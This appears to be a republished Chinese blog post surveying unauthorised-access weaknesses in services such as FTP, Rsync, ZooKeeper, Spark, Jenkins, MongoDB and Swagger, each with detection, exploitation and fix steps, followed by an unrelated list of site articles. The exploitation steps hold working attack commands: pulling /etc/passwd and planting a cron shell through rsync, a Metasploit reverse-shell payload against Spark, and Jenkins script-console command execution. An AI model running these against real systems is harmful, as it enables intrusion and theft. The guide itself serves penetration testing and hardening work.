未授权访问漏洞总结

以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~

目录

FTP未授权访问(21)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

LDAP未授权访问(389)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Rsync未授权访问(873)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

ZooKeeper未授权访问(2181)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

 Docker未授权访问(2375)

Docker Registry未授权访问(5000)

漏洞原理

漏洞利用

漏洞修复

Kibana未授权访问(5601)

漏洞原理

漏洞利用

漏洞修复

VNC未授权访问(5900、5901)

漏洞原理

漏洞检测

漏洞利用

修复方法

CouchDB未授权访问(5984)

漏洞原理

漏洞利用

漏洞修复

Apache Spark未授权访问(6066、8081、8082)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Redis未授权访问(6379)

Weblogic未授权访问(7001)

 JBOSS未授权访问(8080)

Jenkins未授权访问(8080)

漏洞原理

漏洞利用

漏洞修复

Kubernetes API Server未授权(8080、10250)

漏洞原理

漏洞利用

漏洞修复

Active MQ未授权访问(8161)

漏洞原理

漏洞利用

漏洞修复

Jupyter Notebook未授权访问(8888)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

Elasticsearch未授权访问(9200、9300)

漏洞原理

漏洞利用

漏洞修复

Zabbix未授权访问(10051)

漏洞原理

漏洞利用

漏洞修复

 Memcached未授权访问(11211)

漏洞原理

漏洞利用

漏洞修复

RabbitMQ未授权访问(15672、15692、25672)

漏洞原理

漏洞利用

漏洞修复

MongoDB未授权访问(27017)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

NFS未授权访问(2049、20048)

漏洞原理

漏洞利用

漏洞修复

Dubbo未授权访问(28096)

漏洞原理

漏洞利用

漏洞修复

Druid未授权访问

漏洞原理

漏洞利用

漏洞修复

Solr未授权访问

漏洞原理

漏洞利用

SpringBoot Actuator 未授权访问

漏洞原理

漏洞利用

漏洞修复

SwaggerUI未授权访问

漏洞利用

修复方法

 Harbor未授权添加管理员漏洞

漏洞原理


FTP未授权访问(21)

FTP即文件传输协议,使用客户/服务器模式与使用 TCP 传输,属于网络传输协议的应用层,默认使用20、21号两个端口,一个数据端口和一个命令端口,端口20是数据端口,用于文件在客户端和服务器之间传输数据流。端口21是命令端口,用于传输控制流,接受客户端发出的相关FTP命令与参数。

漏洞原理

由于FTP使用弱口令或者启用了匿名登录功能,容易被攻击者攻击,发生恶意文件上传或更严重的入侵行为。

漏洞检测

端口扫描检测,可以使用nmap工具。

漏洞利用

使用匿名用户连接

[root@centos7 vsftpd]# ftp 192.168.75.122
Connected to 192.168.75.122(192.168.75.122).
220 (vsFTPd 3.0.2)
Name (192.168.75.122:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/"

有关于FTP匿名登录利用的有一个VSFTPD2.3.4笑脸漏洞:FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透_ftp匿名登录漏洞-CSDN博客

关于这个漏洞,只要用户输入的用户名包含连续的:)字符,就会自动在6200端口打开一个后门。

漏洞修复

  • 禁止匿名登录
  • 配置强密码

LDAP未授权访问(389)

LDAP即轻型目录访问协议,默认使用389端口,LDAP底层一般使用TCP或UDP作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。

漏洞原理

未对LDAP的访问进行密码验证,导致未授权访问。

漏洞检测

检测脚本参考

# python
# _*_  coding:utf-8 _*_
from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):try:server = Server(ip,get_info=ALL,connect_timeout=1)conn = Connection(server, auto_bind=True)print "[+] ldap login for anonymous"conn.closedexcept:#passprint '[-] checking for ldap anonymous fail'

漏洞利用

使用LdapBrowser直接连入,获取敏感信息。

LDAP是一个用于浏览和管理LDAP服务器的工具。

漏洞修复

  • 修改LDAP的ACL(访问控制列表),禁止匿名访问
  • 设置LDAP访问白名单或黑名单

Rsync未授权访问(873)

Rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAM快速同步多台主机间的文件和目录,默认运行在873端口。

漏洞原理

由于rsync的配置不当,导致允许任何人未授权访问rsync,上传本地文件,下载服务器文件等。

漏洞检测

  • 端口扫描
  • 或者在kali使用rsync命令进行检测
rsync rsync://ip:873/

漏洞利用

可以直接使用rsync工具进行利用

#利用rsync下载passwd文件
rsync rsync://ip:873/src/etc/passwd ./
#查看下载的passwd文件
cat passwd#利用rsync写入shell文件
rsync -av shell rsync://ip:873/src/etc/cron.d/shell

漏洞修复

更改rsync默认配置文件/etc/rsyncd.conf,添加或修改参数:

  • 访问控制;设置host allow,限制允许访问主机的IP。

  • 权限控制;设置read only,将模块设置成只读。

  • 访问认证;设置auth、secrets,认证成功才能调用服务。

  • 模块隐藏;设置list,将模块隐藏。

ZooKeeper未授权访问(2181)

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

漏洞原理

ZooKeeper默认开放2181端口,没有对ZooKeeper进行访问控制,攻击者可通过执行envi命令获得系统大量的敏感信息包括系统名称、Java环境等,任意用户在网络可达的情况下可以进行未授权读取数据甚至杀死服务。

漏洞检测

使用nmap扫描端口

漏洞利用

#列出连接的客户端的统计信息
stat |ncat ip 2181#测试服务器是否正常运行
echo ruok |ncat ip 2181#列出未完成的请求
echo reqs |ncat ip 2181#打印有关服务环境的详细信息
echo envi |ncat ip 2181#列出未完成的会话和临时节点
echo dump |ncat ip 2181

漏洞修复

  • 为ZooKeeper配置相应的访问权限
  • 设置防火墙策略
  • 禁止把ZooKeeper直接暴露在公网

 Docker未授权访问(2375)

Docker未授权访问漏洞详解-CSDN博客

Docker Registry未授权访问(5000)

漏洞原理

默认5000端口,开放远程API,可以docker命令,通过url操作docker。

漏洞利用

端口扫描检测

#获取仓库列表
http://ip:5000/v2/_catalog#获取指定仓库中镜像的tags列表
http://ip:5000/v2/geoglobe-servicemgr/tags/list

漏洞修复

设置ACL,只允许信任ip进行连接。

Kibana未授权访问(5601)

Kibana 是一款开源的数据分析和可视化平台,它是 Elastic Stack 成员之一,设计用于和 Elasticsearch 协作。可以使用 Kibana 对 Elasticsearch 索引中的数据进行搜索、查看、交互操作。

漏洞原理

kibana没有做安全的登录认证,外部能够随意访问数据,造成数据泄露。

漏洞利用

未授权访问的页面,无需账号密码可以直接登录。

http://192.168.126.130:5601/

https://192.168.126.130/app/kibana#

http://192.168.126.130:5601/app/kibana#/

漏洞修复

  • 设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
  • 设置防火墙策略,限定IP访问服务;

VNC未授权访问(5900、5901)

VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。

漏洞原理

默认端口为5900、5901.VNC未授权访问可以造成恶意用户直接控制受控主机。

漏洞检测

检测可以使用nmap进行扫描,查看是否开放5900、5901端口。

可以使用msfconsole工具检测模块进行批量检测

(1) 在 kali 下运行 msfconsolemsfconsole。

(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnxnoneauth。

(3) 显示有哪些选项show options。

(4) 设置地址段set rhosts ip 或 段。

(5) 设置线程set threads 50。

(6) 开始扫描run。

漏洞利用

直接使用VNC客户端输入目标服务器IP进行连接即可,连接成功可以控制目标服务器。

修复方法

(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。

(2) 以最小权限的普通用户身份运行操作系统。

CouchDB未授权访问(5984)

Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。

漏洞原理

HTTP Server默认开启,且没有进行验证,绑定在0.0.0.0上,所有用户均可以通过API访问导致未授权访问。在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。

漏洞利用

使用nmap扫描端口

然后未授权访问其页面,也可以通过curl拉取页面信息

curl ip:5984/_config

漏洞修复

  • 指定CouchDB绑定的IP:在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1,修改后只有本机才能访问。
  • 设置访问密码:在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
  • 设置www-authenticate,强制认证。

Apache Spark未授权访问(6066、8081、8082)

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。

漏洞原理

如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向master节点提交一个应用,master节点会分发给slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁spark集群整体的安全性。

漏洞检测

nmap扫描开放端口

漏洞利用

使用msf工具进行getshell

use exploit/linux/http/spark_unauth_rceset payload java/meterpreter/reverse_tcpset rhost 目标ipset rport 6066set lhost 攻击机ipset lport 4444set srvhost 攻击机ipset srvport 8080exploit

漏洞修复

  • 对外关闭敏感端口;
  • 配置用户权限认证;

Redis未授权访问(6379)

Redis未授权访问漏洞详解(全面)_redis未授权访问漏洞编号-CSDN博客

Weblogic未授权访问(7001)

Weblogic常见漏洞详解_weblogic漏洞-CSDN博客

 JBOSS未授权访问(8080)

JBOSS未授权漏洞漏洞总结-CSDN博客

Jenkins未授权访问(8080)

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞原理

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

漏洞利用

使用nmap进行端口扫描

输入url,进行未授权访问

http://ip:8080/managehttp://ip:8080/script

然后在后台页面执行系统命令

#命令格式
println 'whoami'.execute().text

漏洞修复

  • 对后台控制页面做登录验证限制;
  • 升级Jenkins至新版本;
  • 禁止把Jenkins直接暴露在公网;

Kubernetes API Server未授权(8080、10250)

Kubernetes 是一个全新的基于容器技术的分布式架构解决方案,是 Google 开源的一个容器集群管理系统,Kubernetes 简称 K8S。

漏洞原理

kubernets服务正常启动后会开放两个端口:Localhost Port(默认8080)、Secure Port(默认6443)。这两个端口都提供了API Server,一个通过web访问(而10250端口是kubelet API的HTTPS端口),一个通过kubectl客户端进行调用。如果没有进行合理的配置验证和权限,那么攻击者可以通过这两个接口去获取容器的权限。

漏洞利用

使用nmap进行端口扫描

访问https://ip/10250/pods获取环境变量、运行的容器信息、命名空间等信息。

漏洞修复

  • 进行授权认证;
  • 使用Service Account令牌;
  • 设置防火墙策略,限定IP访问服务;

Active MQ未授权访问(8161)

ActiveMQ是一款流行的开源消息服务器(就是消息中间件)。

漏洞原理

ActiveMQ服务是默认没有配置安全参数的,这导致攻击者可以在默认配置下发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。

漏洞利用

默认配置下,默认端口为8161,默认账号/密码为admin/admin

漏洞修复

  • 禁止未授权访问:修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true
  • 设置强口令:修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码

Jupyter Notebook未授权访问(8888)

Jupyter Notebook是一个交互式笔记本,支持运行 40 多种编程语言,用于创建和共享程序文档,支持实时代码。

漏洞原理

如果管理员未配置密码,将导致未授权访问漏洞,攻击者可以在其中创建一个console并很仔细任意python代码和命令。

漏洞利用

靶场搭建

这里使用vulhub搭建漏洞

cd vulhub/jupyter/notebook-rce
docker-compose up -d

漏洞利用

访问http://ip:8888未授权进入后台页面

然后在New->Terminal创建控制台

便可以执行任意命令

漏洞修复

  • 开启身份验证,防止未经授权用户访问。
  • 访问控制策略,限制IP访问,绑定固定IP。

Elasticsearch未授权访问(9200、9300)

Elasticsearch是一款Java编写的企业级搜索服务引擎。被广泛应用于实时日志分析处理、信息检索、以及数据的多维查询和统计分析等场景。

漏洞原理

启动服务默认会开放9200端口或9300端口,可被攻击者未授权访问进行非法操作。

漏洞利用

使用nmap进行端口扫描

然后访问url,查看敏感数据

http://localhost:9200http://localhost:9200/_cat/    //查看目录http://localhost:9200/_cat/indiceshttp://localhost:9200/_river/_search //查看数据库敏感信息http://localhost:9200/_nodes         //查看节点数据http://localhost:9200/_plugin/head/  //web管理界面(安装了head插件)

漏洞修复

  • 访问控制策略,限制IP访问,绑定固定IP;
  • 在config/elasticsearch.yml中为9200端口设置认证等;

Zabbix未授权访问(10051)

Zabbix是一个基于web界面的提供分布式系统监视以及网络监控功能的企业级的开源解决方案。

漏洞原理

如果管理员没有更改默认配置,那么默认开放端口为10051,且无需账号密码即可登录后台。其中web后台是由PHP编写,用来显示数据库中的结果。

漏洞利用

使用nmap进行端口扫描

然后无需账号密码即可访问后台页面:http://ip:8080/zabbix.php

漏洞修复

  • 设置Zabbix的复杂口令,禁用Guest登录功能;
  • zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
  • 禁止agent执行run,不要设置EnableRemoteCommands=1;

 Memcached未授权访问(11211)

Memcached是由C语言编写的一个自由开源的、高性能的、分布式的内存对象缓存系统。内存存储可以减少数据库访问次数,提高Web应用次数。

Memcached与Redis有一些相似,它们都是内存存储数据库。不同点就是Memcached可以存储图图片、视频等数据,但是Redis可以存储list、set等的复杂数据类型,而Memcached只支持存储简答的数据类型,而且Redis只使用单核,而Memcached是可以使用多核的。总而言之,Redis适合存储小数据,Memcached适合存储大数据。

漏洞原理

依然是不需要密码即可访问。

默认端口为11211.

漏洞利用

1、使用nmap进行远程扫描,存在11211端口

nmap -p 11211 rhost-ip

2、使用telent远程登录,可以直接登录成功

telnet rhost-ip

漏洞修复

  • 如果Memcached只在内网使用,可在Memcached启动的时候指定绑定的IP地址为127.0.0.1.
memcached -d -m 1024 -u root -l 127.0.0.1-p 11211 -c 1024 -P /tmp/memcached.pid
  • 如果Memcached需要对外提供服务,可以配置iptables规则进行访问控制
#配置iptables规则,只允许192.168.15.249对11211端口进行访问
iptables -A INPUT -p tcp -s 192.168.15.249 --dport 11211 -j ACCEPT#保存规则
service iptables save#重启iptables
service iptables restart

RabbitMQ未授权访问(15672、15692、25672)

RabbitMQ是非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。

漏洞原理

在默认配置下,账号密码已知,且默认端口对外开放,攻击者可以未授权访问窃取数据。

漏洞利用

使用端口扫描

访问url页面,默认账号密码都为guest

http://ip:15672http://ip:15692http://ip:25672

漏洞修复

  • 修改为强密码,删除默认的账号guest;
  • 禁止对外网开放,仅限于内部访问;

MongoDB未授权访问(27017)

MongoDB数据库由C++编写,主要是为了提供Web应用提供可扩展的高性能数据存储解决方案。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。

漏洞原理

MongoDB数据库安装完成之后默认空口令导致攻击者无需账号就可以直接登录,进行增删改查操作。

默认端口:27017

漏洞利用

靶场搭建

攻击机:kai

靶机:Ubuntu(需要使用docker环境搭建)

1、拉取MongoDB镜像文件

docker pull mongo

2、创建容器并将MongoDB运行

docker run -d -p 27017:27017 mongo

3、查看运行端口

docker ps -a

4、攻击机扫描端口

漏洞利用

参考链接:MongoDB 未授权访问漏洞利用-CSDN博客

1、在kali里面导入MongoDB公共GPG密钥:

wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -

2、创建一个列表用于配置下载列表和下载源

echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list

3、重新加载更新源

apt-get update

4、安装MongoDB的最新稳定版本

apt-get install -y mongodb-org

 如果这里出现libssl1.1不能下载的报错,可以更新源,然后再次进行下载。解决方法参考:解决E: Unable to correct problems, you have held broken packages.(亲测有效)-CSDN博客

5、启动MongoDB进程

systemctl start mongod

6、直接使用命令进行连接(无口令连接)

mongo --host 192.168.122.1 --port 27017

7、连接后即可查看用户、数据库等信息。

8、然后创建一个管理员账号

#切换到admin库:
> use admin
switched to db admin#创建用户
> db.createUser({user: "myUserAdmin",pwd: "Passw0rd",roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]}
)#创建成功后提示信息:Successfully added user: {"user" : "myUserAdmin","roles" : [{"role" : "userAdminAnyDatabase","db" : "admin"}]
}

9、ssh登录系统,账号密码为上面创建账户的账号密码。

除了上面较复杂的过程,也可以使用msf集成工具进行攻击。

在探测存在27017端口后,可以使用

msf6 > use auxiliary/scanner/mongodb/mongodb_login

漏洞修复

  • 如果mongodb只需在本地使用,建议只在本地开启监听服务
  • 如果mongodb只对内网提供服务,简体禁止将MongoDB服务发布在互联网上,并在主机上通过防火墙限制访问源IP
  • 最大的漏洞成因就是可以无口令进行登录,所以建议启动基于角色的登录认证功能。

NFS未授权访问(2049、20048)

NFS是UNIX表示层协议,能让使用者访问网络别处的文件就像在使用自己计算机一样。

漏洞原理

NFS配置不当,未限制对外访问,导致共享目录泄露。

漏洞利用

#安装nfs客户端
apt install nfs-common#查看nfs服务器上的共享目录
showmount -e ip#挂载到本地
mount -t nfs ip:/grdata /mnt#卸载共享目录
umount /mnt

或者在windows系统上也可以直接利用映射网络驱动器。

漏洞修复

  • 利用iptables限制端口2049和20048端口的访问,禁止外部访问;
  • 设置/etc/exports,对访问进行控

Dubbo未授权访问(28096)

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。

漏洞原理

因配置不当而导致未授权访问漏洞

漏洞利用

扫描端口后直接连接进入dubbo服务

#连接进入dubbo服务
telent ip port#查看框架情况
status -l

漏洞修复

  • 配置dubbo认证;
  • 设置防火墙策略,限定IP访问;

Druid未授权访问

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。

漏洞原理

首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

漏洞利用

无需登录,即可登录Druid监控页面,访问以下url

/druid/index.html/druid/websession.html/druid/datasource.html/druid/sql.html/druid/spring.html

漏洞修复

  • 配置访问账号密码;
  • 禁止对外网开放访问;

Solr未授权访问

Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。

漏洞原理

配置不当导致可以任意未授权访问,可查询所有数据库信息,甚至可读取系统任意文件,获取shell。

漏洞利用

访问如下url

http://xx.xx.com/solr/adminhttps://xx.xx.com/solr/admin

漏洞修复

  • 配置solr访问控制权限;
  • 禁止将solr暴露在公网;

SpringBoot Actuator 未授权访问

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。

漏洞原理

在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。

漏洞利用

 

漏洞修复

  •     禁用/env接口;
  •     升级到SpringBoot Actuator 2.0;
  •     禁止对外开放;

SwaggerUI未授权访问

Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。

漏洞利用

访问以下url

/api

/api-docs

/api-docs/swagger.json

/api.html

/api/api-docs

/api/apidocs

/api/doc

/api/swagger

/api/swagger-ui

/api/swagger-ui.html

/api/swagger-ui.html/

/api/swagger-ui.json

/api/swagger.json

/api/swagger/

/api/swagger/ui

/api/swagger/ui/

/api/swaggerui

/api/swaggerui/

/api/v1/

/api/v1/api-docs

/api/v1/apidocs

/api/v1/swagger

/api/v1/swagger-ui

/api/v1/swagger-ui.html

/api/v1/swagger-ui.json

/api/v1/swagger.json

/api/v1/swagger/

/api/v2

/api/v2/api-docs

/api/v2/apidocs

/api/v2/swagger

/api/v2/swagger-ui

/api/v2/swagger-ui.html

/api/v2/swagger-ui.json

/api/v2/swagger.json

/api/v2/swagger/

/api/v3

/apidocs

/apidocs/swagger.json

/doc.html

/docs/

/druid/index.html

/graphql

/libs/swaggerui

/libs/swaggerui/

/spring-security-oauth-resource/swagger-ui.html

/spring-security-rest/api/swagger-ui.html

/sw/swagger-ui.html

/swagger

/swagger-resources

/swagger-resources/configuration/security

/swagger-resources/configuration/security/

/swagger-resources/configuration/ui

/swagger-resources/configuration/ui/

/swagger-ui

/swagger-ui.html

/swagger-ui.html#/api-memory-controller

/swagger-ui.html/

/swagger-ui.json

/swagger-ui/swagger.json

/swagger.json

/swagger.yml

/swagger/

/swagger/index.html

/swagger/static/index.html

/swagger/swagger-ui.html

/swagger/ui/

/Swagger/ui/index

/swagger/ui/index

/swagger/v1/swagger.json

/swagger/v2/swagger.json

/template/swagger-ui.html

/user/swagger-ui.html

/user/swagger-ui.html/

/v1.x/swagger-ui.html

/v1/api-docs

/v1/swagger.json

/v2/api-docs

/v3/api-docs

修复方法

设置访问权限

 Harbor未授权添加管理员漏洞

漏洞原理

Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。

参考这篇文章:Harbor未授权创建管理员漏洞(CVE-2019-16097)_harbor未授权添加管理员漏洞-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/29341.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

微信小程序---支付

一、判断是否登录 如果没有登录,走前端登录流程,不再赘述 二、获取订单编号 跟自己的后端商议入参,然后获取订单编号 三、通过订单编号获取wx.requestPayment()需要的参数 获取订单编号再次请求后端接口,拿到wx.requestPayme…

Mongodb介绍及window环境安装

本文主要内容为nosql数据库-MongoDB介绍及window环境安装。 目录 什么是MongoDB? 主要特点 MongoDB 与Mysql对应 安装MongoDB 下载MongoDB 自定义安装 创建目录 配置环境变量 配置MongoDB服务 服务改为手动 启动与关闭 安装MongoDB Shell 下载安装包 …

触发器结构

1.修改分隔符符号 delimiter$$ 可以修改成$$//都可以 2.创建触发器函数名称 create trigger函数名 3.什么样的操作触发,操作哪个表 after:...之后触发 before:...之前触发 insert:...插入被触发 update:...修改被触发 delete:...删除被触发 on 表名 实例…

介绍一下VueUse中useAsyncState的实现原理

useAsyncState 是 VueUse 库中提供的一个实用工具,它用于处理异步状态。这个 Hook 允许你在 Vue 组件中以同步的方式处理异步操作的状态,比如加载、加载中、错误等。 useAsyncState 的实现原理通常涉及以下几个核心概念: 响应式系统&#xf…

三:SpringBoot的helloworld和使用Springboot的优点以及快速创建Springboot应用

三:SpringBoot的helloworld和使用Springboot的优点以及快速创建Springboot应用 一:HelloWorld [我们创建的是maven项目或者直接创建一个Spring] 1.1:创建一个maven 项目(1】:需要自己手动写一个SpringBoot 的启动类同…

Python自动化办公篇—pandas操作Excel:读取+查看+选择+清洗+排序+筛选+函数+写入

目录 专栏导读库的介绍库的安装1、读取数据2、查看数据3、选择数据4、数据清洗5、数据排序6、数据筛选7、数据操作8、数据写入总结 专栏导读 文章名称链接Python自动化办公—pyautogui图像定位\点击功能,实现自动截取当前屏幕并检索点击(可制作为游戏点击脚本)点我进行跳转Pyt…

为什么网上这么多破解 Intellij IDEA 的工具,但是官方却不管呢?

大家好,我是小2,一个程序员~ 程序员小2 每天一篇技术重磅好文,涉及一线互联网大厂应用架构(高可用、高性能、高稳定),AI、大数据、java架构等热门领域。 112篇原创内容 公众号 来源:Java知音…

基于Spring Boot+VUE旅游管理系统

1管理员功能模块 管理员通过点击后台管理,进入页面可以输入用户名、密码、角色进行登录相对应操作,如图1所示。 图1管理员登录界面 管理员通过点击后台管理,进入页面可以填写首页、个人中心、用户管理、旅游方案管理、旅游购买管理、系统管…

python web框架哪家强?Flask、Django、FastAPI对比

前言 当你掌握了python的基础知识,并且会用和HTML和CSS编写简单的静态网页。现在你只需再掌握一个python web框架的知识,就可以开始编写一个动态的网站了。目前市面比较流程的python web框架有三个flask、Django、FastAPI。接下来我们对比一下。他们三个…

bwip-js-条码生成-常见条码类型-常用参数设置

文章目录 1.常用参数设置2.常见条码类型3.常见参数4.总结1.常用参数设置 生成svg代码。 var BWIPJS = require(bwip-js);let svg = BWIPJS.toSVG({bcid: code128, // 条形码类型text: 123456789, // 显示文本scale: 1, // 放大系数width: 20, …

sherpa-onnx说话人识别+语音识别自动开启(VAD)+语音识别Python API

专栏总目录 获取该开源项目的渠道,是我在b站上,看到了由csukuangfj制作的一套语音识别视频。以下地址均为csukuangfj在视频中提供,感谢分享! 新一代 Kaldi: 说话人识别+VAD+语音识别之 Python API_哔哩哔哩_bilibili 开源项目地址:GitHub - k2-fsa/sherpa-onnx: Speech-t…

HarmonyOS NEXT 从不懂到 ToDo List 实例开发

本文将从一个前端开发者的角度出发,速通鸿蒙 Next 开发的方方面面,并最终开发一个 Todo List 小实例。 简介 首先,鸿蒙使用 ArkTS 作为原生开发语言。如果你熟悉 TypeScript 编程语言,那基本上可以无缝过渡,因为 Ark…

Linux常⽤服务器构建-samba

目录 1. 介绍 2. 安装 3. 配置 3.1 创建存放共享⽂件的路径 3.2 创建samba账户 4 重启samba 5. 访问共享⽂件 5.1 mac下访问⽅式 5.2 windows下访问⽅式 1. 介绍 Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的⼀个免费软件,能够完成在 windows 、 mac 操作系统…

统计分析方法-非参数检验-python

文章目录 前言非参数检验特点常见的非参数检验一、Cliffs Delta动机定义二、Wilcoxon Signed-Rank Test定义三、 Friedman检验适用场景公式python 代码Wilcoxon Signed-Rank Test和 cliffs deltaFriedman前言 记录一下自非参数检验的学习过程,如有不对请纠正。 非参数检验 …

C# OpenCvSharp函数形参-Size

在C#中使用OpenCvSharp库时,Mat类是用于表示图像的主要数据结构之一。Mat类的构造函数之一是Mat(Size size, int type),其中size和type是两个重要的参数。下面是对这两个参数的详细解释和使用方法。📸 参数解释🔍 Size size: S…

[AI资讯·0618] 快手AI模型“可灵“在质量优于Sora,OpenAI和谷歌发布新技术推动AI视频推理发展,Gemini1.5Pro在该榜单中表现突出

AI资讯 陕西推出AI千亿级发展计划,五大产业集群,智算超3000P试了快手的视频AI,竟然有点领先“技术故障”背刺巴菲特,金融大模型到底靠不靠谱?Gemini视频推理遥遥领先GPT-4o,首个视频多模态基准Video-MME国…

dockerhub无法拉取镜像后,国内怎么拉取镜像?

一、比如你拉取的镜像在hub.docker 你要拉取的镜像前面加前缀: m.daocloud.io 这里比如我要拉取: nginx-ingress:latest 正常我们是 docker pull nginx/nginx-ingress 现在因为某些原因,我们需要下面这样写: docker pull …

重新定义DPU——中科驭数2024产品发布会,6月19日诚邀莅临!

数据中心正经历着前所未有的变革,DPU作为数据中心第三颗主力芯片,正引领行业步入一个高效、灵活的算力新时代。 中科驭数在业内率先完成三代DPU芯片研发迭代,并完成规模化商用落地。一路以来,我们衷心地感谢客户和合作伙伴的鼎力…

避雷!又6本期刊被On Hold!ELSEVIER旗下影响因子高达10+SSCI上榜

【SciencePub学术】继《INFORMATION SCIENCES》被On Hold 之后,又新增3本SCIE期刊、3本SSCI期刊被列入On Hold名单。其中包含ELSEVIER旗下影响因子高达10的《RESOURCES POLICY》。 官方现在对期刊质量的管控越来越严格了,被标记为On Hold后的期刊中&…

10.Python使用chromedriver加selenium模拟人工对浏览器进行操作

在使用python时如果需要对浏览器进行一些操作,我们会用到两个常用的框架,今天一起来看一下。 chromedriver 浏览器驱动,可以理解为一个没有界面的chrome浏览器. Chromedriver 是一个自动化测试工具,它允许开发者通过编程的方式控制 Google Chrome 浏览器,用于自动化测试…